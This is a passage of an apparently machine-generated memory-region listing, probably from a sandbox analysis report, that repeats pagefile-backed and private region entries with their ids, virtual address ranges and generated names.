pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 18677 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18678 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18679 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18680 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18681 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18682 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18683 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18684 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18685 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18686 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18687 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18688 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18689 start_va = 0x2a0000 end_va = 0x2b0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18690 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18691 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18692 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18693 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18694 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18695 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18696 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18697 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18698 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18699 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18700 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18701 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18702 start_va 
= 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18703 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18704 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18705 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18706 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18707 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18708 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18709 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18710 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18711 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18712 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18713 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18714 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 18715 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18716 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18717 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18718 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18719 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18720 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18721 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18722 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18723 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18724 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18725 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18726 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18849 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = 
"private_0x00000000002a0000" filename = "" Region: id = 18850 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 18851 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 18852 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 18853 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18854 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18855 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18856 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18857 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18858 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18859 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18860 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18861 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18862 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18863 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18864 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18865 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18866 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18867 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18868 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18869 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18870 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18871 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18872 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18873 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18874 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18880 start_va = 0x2a0000 end_va 
= 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18881 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18882 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18883 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18884 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18885 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18886 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18887 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18888 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18889 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18890 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18891 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18892 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 
18893 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18894 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18895 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18896 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18897 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18898 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18899 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18900 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18901 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18902 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18903 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18904 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18905 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 18906 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 18907 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 18908 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 18909 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 18910 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18911 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18912 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18913 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18914 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18915 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18916 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18917 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18918 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18919 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18920 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18921 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18922 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18923 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18924 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18925 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18926 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18927 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18928 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18929 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18930 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18931 start_va = 0x2a0000 end_va = 0x2affff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18932 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18933 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18934 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18935 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18936 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18937 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18938 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18939 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18940 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18941 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18942 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18943 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18944 start_va 
= 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18945 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18946 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18947 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18948 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18949 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18950 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18951 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18952 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18953 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18954 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18955 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18956 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 18957 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18958 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18959 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19090 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 19091 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 19092 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 19093 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 19094 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19095 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19096 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19097 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19098 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19099 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 19100 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19101 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19102 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19103 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19104 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19105 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19106 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19107 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19108 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19109 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19110 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19111 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19112 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19113 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19114 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19115 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19116 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19117 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19118 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19119 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19120 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19121 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19122 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19123 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19124 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19125 start_va = 0x2a0000 end_va 
